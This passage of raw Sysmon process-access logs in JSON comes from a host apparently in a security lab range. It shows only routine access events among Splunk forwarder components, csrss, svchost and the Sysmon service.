07:03:00.373","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-00100BBB1000}","TargetProcessId":"212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-00100BBB1000}\r\nTargetProcessId: 212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-00100BBB1000}","TargetProcessId":"212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 